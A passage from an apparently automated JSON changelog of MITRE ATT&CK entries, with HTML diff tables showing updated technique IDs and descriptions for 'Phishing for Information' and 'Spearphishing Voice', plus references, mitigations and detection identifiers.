nowrap=\"nowrap\">nformation&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;during&nbsp;targeting.&nbsp;Phishing&nbsp;for&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nformation&nbsp;is&nbsp;an&nbsp;attempt&nbsp;to&nbsp;trick&nbsp;targets&nbsp;into&nbsp;divulging&nbsp;inf</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nformation&nbsp;is&nbsp;an&nbsp;attempt&nbsp;to&nbsp;trick&nbsp;targets&nbsp;into&nbsp;divulging&nbsp;inf</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ormation,&nbsp;frequently&nbsp;credentials&nbsp;or&nbsp;other&nbsp;actionable&nbsp;informa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ormation,&nbsp;frequently&nbsp;credentials&nbsp;or&nbsp;other&nbsp;actionable&nbsp;informa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion.&nbsp;Phishing&nbsp;for&nbsp;information&nbsp;is&nbsp;different&nbsp;from&nbsp;[Phishing](</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion.&nbsp;Phishing&nbsp;for&nbsp;information&nbsp;is&nbsp;different&nbsp;from&nbsp;[Phishing](</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">https://attack.mitre.org/techniques/T1566)&nbsp;in&nbsp;that&nbsp;the&nbsp;objec</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">https://attack.mitre.org/techniques/T1566)&nbsp;in&nbsp;that&nbsp;the&nbsp;objec</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tive&nbsp;is&nbsp;gathering&nbsp;data&nbsp;from&nbsp;the&nbsp;victim&nbsp;rather&nbsp;than&nbsp;executing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tive&nbsp;is&nbsp;gathering&nbsp;data&nbsp;from&nbsp;the&nbsp;victim&nbsp;rather&nbsp;than&nbsp;executing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;malicious&nbsp;code.&nbsp;&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;are&nbsp;electronically&nbsp;d</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;malicious&nbsp;code.&nbsp;&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;are&nbsp;electronically&nbsp;d</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">elivered&nbsp;social&nbsp;engineering.&nbsp;Phishing&nbsp;can&nbsp;be&nbsp;targeted,&nbsp;known</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">elivered&nbsp;social&nbsp;engineering.&nbsp;Phishing&nbsp;can&nbsp;be&nbsp;targeted,&nbsp;known</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;as&nbsp;spearphishing.&nbsp;In&nbsp;spearphishing,&nbsp;a&nbsp;specific&nbsp;individual,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;as&nbsp;spearphishing.&nbsp;In&nbsp;spearphishing,&nbsp;a&nbsp;specific&nbsp;individual,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">company,&nbsp;or&nbsp;industry&nbsp;will&nbsp;be&nbsp;targeted&nbsp;by&nbsp;the&nbsp;adversary.&nbsp;More</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">company,&nbsp;or&nbsp;industry&nbsp;will&nbsp;be&nbsp;targeted&nbsp;by&nbsp;the&nbsp;adversary.&nbsp;More</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;generally,&nbsp;adversaries&nbsp;can&nbsp;conduct&nbsp;non-targeted&nbsp;phishing,&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;generally,&nbsp;adversaries&nbsp;can&nbsp;conduct&nbsp;non-targeted&nbsp;phishing,&nbsp;s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uch&nbsp;as&nbsp;in&nbsp;mass&nbsp;credential&nbsp;harvesting&nbsp;campaigns.&nbsp;&nbsp;Adversaries</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uch&nbsp;as&nbsp;in&nbsp;mass&nbsp;credential&nbsp;harvesting&nbsp;campaigns.&nbsp;&nbsp;Adversaries</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;also&nbsp;try&nbsp;to&nbsp;obtain&nbsp;information&nbsp;directly&nbsp;through&nbsp;the&nbsp;exc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;also&nbsp;try&nbsp;to&nbsp;obtain&nbsp;information&nbsp;directly&nbsp;through&nbsp;the&nbsp;exc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hange&nbsp;of&nbsp;emails,&nbsp;instant&nbsp;messages,&nbsp;or&nbsp;other&nbsp;electronic&nbsp;conve</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hange&nbsp;of&nbsp;emails,&nbsp;instant&nbsp;messages,&nbsp;or&nbsp;other&nbsp;electronic&nbsp;conve</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rsation&nbsp;means.(Citation:&nbsp;ThreatPost&nbsp;Social&nbsp;Media&nbsp;Phishing)(C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rsation&nbsp;means.(Citation:&nbsp;ThreatPost&nbsp;Social&nbsp;Media&nbsp;Phishing)(C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;TrendMictro&nbsp;Phishing)(Citation:&nbsp;PCMag&nbsp;FakeLogin)(Ci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;TrendMictro&nbsp;Phishing)(Citation:&nbsp;PCMag&nbsp;FakeLogin)(Ci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;Sophos&nbsp;Attachment)(Citation:&nbsp;GitHub&nbsp;Phishery)&nbsp;Victim</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;Sophos&nbsp;Attachment)(Citation:&nbsp;GitHub&nbsp;Phishery)&nbsp;Victim</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;may&nbsp;also&nbsp;receive&nbsp;phishing&nbsp;messages&nbsp;that&nbsp;direct&nbsp;them&nbsp;to&nbsp;cal</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;may&nbsp;also&nbsp;receive&nbsp;phishing&nbsp;messages&nbsp;that&nbsp;direct&nbsp;them&nbsp;to&nbsp;cal</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;a&nbsp;phone&nbsp;number&nbsp;where&nbsp;the&nbsp;adversary&nbsp;attempts&nbsp;to&nbsp;collect&nbsp;con</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;a&nbsp;phone&nbsp;number&nbsp;where&nbsp;the&nbsp;adversary&nbsp;attempts&nbsp;to&nbsp;collect&nbsp;con</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fidential&nbsp;information.(Citation:&nbsp;Avertium&nbsp;callback&nbsp;phishing)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fidential&nbsp;information.(Citation:&nbsp;Avertium&nbsp;callback&nbsp;phishing)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;&nbsp;Phishing&nbsp;for&nbsp;information&nbsp;frequently&nbsp;involves&nbsp;social&nbsp;engine</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;&nbsp;Phishing&nbsp;for&nbsp;information&nbsp;frequently&nbsp;involves&nbsp;social&nbsp;engine</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ering&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;source&nbsp;with&nbsp;a&nbsp;reason&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ering&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;source&nbsp;with&nbsp;a&nbsp;reason&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;collect&nbsp;information&nbsp;(ex:&nbsp;[Establish&nbsp;Accounts](https://atta</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;collect&nbsp;information&nbsp;(ex:&nbsp;[Establish&nbsp;Accounts](https://atta</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ck.mitre.org/techniques/T1585)&nbsp;or&nbsp;[Compromise&nbsp;Accounts](http</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ck.mitre.org/techniques/T1585)&nbsp;or&nbsp;[Compromise&nbsp;Accounts](http</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s://attack.mitre.org/techniques/T1586))&nbsp;and/or&nbsp;sending&nbsp;multi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s://attack.mitre.org/techniques/T1586))&nbsp;and/or&nbsp;sending&nbsp;multi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ple,&nbsp;seemingly&nbsp;urgent&nbsp;messages.&nbsp;Another&nbsp;way&nbsp;to&nbsp;accomplish&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ple,&nbsp;seemingly&nbsp;urgent&nbsp;messages.&nbsp;Another&nbsp;way&nbsp;to&nbsp;accomplish&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">is&nbsp;is&nbsp;by&nbsp;[Email&nbsp;Spoofing](https://attack.mitre.org/technique</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">is&nbsp;is&nbsp;by&nbsp;[Email&nbsp;Spoofing](https://attack.mitre.org/technique</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s/T16<span class=\"diff_chg\">7</span>2)(Citation:&nbsp;Proofpoint-spoof)&nbsp;the&nbsp;identity&nbsp;of&nbsp;the&nbsp;sen</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s/T16<span class=\"diff_chg\">84/00</span>2)(Citation:&nbsp;Proofpoint-spoof)&nbsp;the&nbsp;identity&nbsp;of&nbsp;the</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">der,&nbsp;which&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;fool&nbsp;both&nbsp;the&nbsp;human&nbsp;recipient&nbsp;as&nbsp;w</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;sender,&nbsp;which&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;fool&nbsp;both&nbsp;the&nbsp;human&nbsp;recipient&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ell&nbsp;as&nbsp;automated&nbsp;security&nbsp;tools.(Citation:&nbsp;cyberproof-double</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;well&nbsp;as&nbsp;automated&nbsp;security&nbsp;tools.(Citation:&nbsp;cyberproof-do</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-bounce)&nbsp;&nbsp;&nbsp;Phishing&nbsp;for&nbsp;information&nbsp;may&nbsp;also&nbsp;involve&nbsp;evasive</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uble-bounce)&nbsp;&nbsp;&nbsp;Phishing&nbsp;for&nbsp;information&nbsp;may&nbsp;also&nbsp;involve&nbsp;eva</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;removing&nbsp;or&nbsp;manipulating&nbsp;emails&nbsp;or&nbsp;meta</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sive&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;removing&nbsp;or&nbsp;manipulating&nbsp;emails&nbsp;or&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">data/headers&nbsp;from&nbsp;compromised&nbsp;accounts&nbsp;being&nbsp;abused&nbsp;to&nbsp;send&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">metadata/headers&nbsp;from&nbsp;compromised&nbsp;accounts&nbsp;being&nbsp;abused&nbsp;to&nbsp;s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">messages&nbsp;(e.g.,&nbsp;[Email&nbsp;Hiding&nbsp;Rules](https://attack.mitre.or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">end&nbsp;messages&nbsp;(e.g.,&nbsp;[Email&nbsp;Hiding&nbsp;Rules](https://attack.mitr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/techniques/T1564/008)).(Citation:&nbsp;Microsoft&nbsp;OAuth&nbsp;Spam&nbsp;202</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/techniques/T1564/008)).(Citation:&nbsp;Microsoft&nbsp;OAuth&nbsp;Spam</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">2)(Citation:&nbsp;Palo&nbsp;Alto&nbsp;Unit&nbsp;42&nbsp;VBA&nbsp;Infostealer&nbsp;2014)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2022)(Citation:&nbsp;Palo&nbsp;Alto&nbsp;Unit&nbsp;42&nbsp;VBA&nbsp;Infostealer&nbsp;2014)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1054: Software Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0823: Detection of Phishing for Information"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-09-07 21:48:39.516000+00:00",
                    "modified": "2026-04-17 16:07:06.553000+00:00",
                    "name": "Spearphishing Voice",
                    "description": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \"vishing\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)\n\nVictims may also receive phishing messages that direct them to call a phone number (\"callback phishing\") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "reconnaissance"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1598/004",
                            "external_id": "T1598.004"
                        },
                        {
                            "source_name": "Avertium callback phishing",
                            "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.",
                            "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing"
                        },
                        {
                            "source_name": "BOA Telephone Scams",
                            "description": "Bank of America. (n.d.). How to avoid telephone scams. Retrieved September 8, 2023.",
                            "url": "https://business.bofa.com/en-us/content/what-is-vishing.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 16:07:06.553000+00:00\", \"old_value\": \"2025-04-15 23:11:31.420000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\\n\\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \\\"vishing\\\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)\\n\\nVictims may also receive phishing messages that direct them to call a phone number (\\\"callback phishing\\\") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\\n\\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.\", \"old_value\": \"Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\\n\\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \\\"vishing\\\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)\\n\\nVictims may also receive phishing messages that direct them to call a phone number (\\\"callback phishing\\\") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\\n\\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n-Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\\n+Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\\n \\n All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \\\"vishing\\\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)\\n \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to26__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to26__0\"><a href=\"#difflib_chg_to26__top\">t</a></td><td class=\"diff_header\" id=\"from26_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;use&nbsp;voice&nbsp;communications&nbsp;to&nbsp;elicit&nbsp;sensitive</td><td class=\"diff_next\"><a href=\"#difflib_chg_to26__top\">t</a></td><td class=\"diff_header\" id=\"to26_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;use&nbsp;voice&nbsp;communications&nbsp;to&nbsp;elicit&nbsp;sensitive</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;information&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;during&nbsp;targeting.&nbsp;Spearphishin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;information&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;during&nbsp;targeting.&nbsp;Spearphishin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;for&nbsp;information&nbsp;is&nbsp;an&nbsp;attempt&nbsp;to&nbsp;trick&nbsp;targets&nbsp;into&nbsp;divulg</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;for&nbsp;information&nbsp;is&nbsp;an&nbsp;attempt&nbsp;to&nbsp;trick&nbsp;targets&nbsp;into&nbsp;divulg</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;information,&nbsp;frequently&nbsp;credentials&nbsp;or&nbsp;other&nbsp;actionable&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;information,&nbsp;frequently&nbsp;credentials&nbsp;or&nbsp;other&nbsp;actionable&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">information.&nbsp;Spearphishing&nbsp;for&nbsp;information&nbsp;frequently&nbsp;involv</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">information.&nbsp;Spearphishing&nbsp;for&nbsp;information&nbsp;frequently&nbsp;involv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;social&nbsp;engineering&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;source</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;social&nbsp;engineering&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;source</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;with&nbsp;a&nbsp;reason&nbsp;to&nbsp;collect&nbsp;information&nbsp;(ex:&nbsp;[Impersonation](h</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;with&nbsp;a&nbsp;reason&nbsp;to&nbsp;collect&nbsp;information&nbsp;(ex:&nbsp;[Impersonation](h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T16<span class=\"diff_chg\">56</span>))&nbsp;and/or&nbsp;creating&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T16<span class=\"diff_chg\">84/001</span>))&nbsp;and/or&nbsp;creati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;sense&nbsp;of&nbsp;urgency&nbsp;or&nbsp;alarm&nbsp;for&nbsp;the&nbsp;recipient.&nbsp;&nbsp;All&nbsp;forms&nbsp;of&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng&nbsp;a&nbsp;sense&nbsp;of&nbsp;urgency&nbsp;or&nbsp;alarm&nbsp;for&nbsp;the&nbsp;recipient.&nbsp;&nbsp;All&nbsp;forms</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">phishing&nbsp;are&nbsp;electronically&nbsp;delivered&nbsp;social&nbsp;engineering.&nbsp;In</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;phishing&nbsp;are&nbsp;electronically&nbsp;delivered&nbsp;social&nbsp;engineering</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;this&nbsp;scenario,&nbsp;adversaries&nbsp;use&nbsp;phone&nbsp;calls&nbsp;to&nbsp;elicit&nbsp;sensit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.&nbsp;In&nbsp;this&nbsp;scenario,&nbsp;adversaries&nbsp;use&nbsp;phone&nbsp;calls&nbsp;to&nbsp;elicit&nbsp;se</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ive&nbsp;information&nbsp;from&nbsp;victims.&nbsp;Known&nbsp;as&nbsp;voice&nbsp;phishing&nbsp;(or&nbsp;\"v</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nsitive&nbsp;information&nbsp;from&nbsp;victims.&nbsp;Known&nbsp;as&nbsp;voice&nbsp;phishing&nbsp;(o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ishing\"),&nbsp;these&nbsp;communications&nbsp;can&nbsp;be&nbsp;manually&nbsp;executed&nbsp;by&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;\"vishing\"),&nbsp;these&nbsp;communications&nbsp;can&nbsp;be&nbsp;manually&nbsp;executed&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dversaries,&nbsp;hired&nbsp;call&nbsp;centers,&nbsp;or&nbsp;even&nbsp;automated&nbsp;via&nbsp;roboca</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 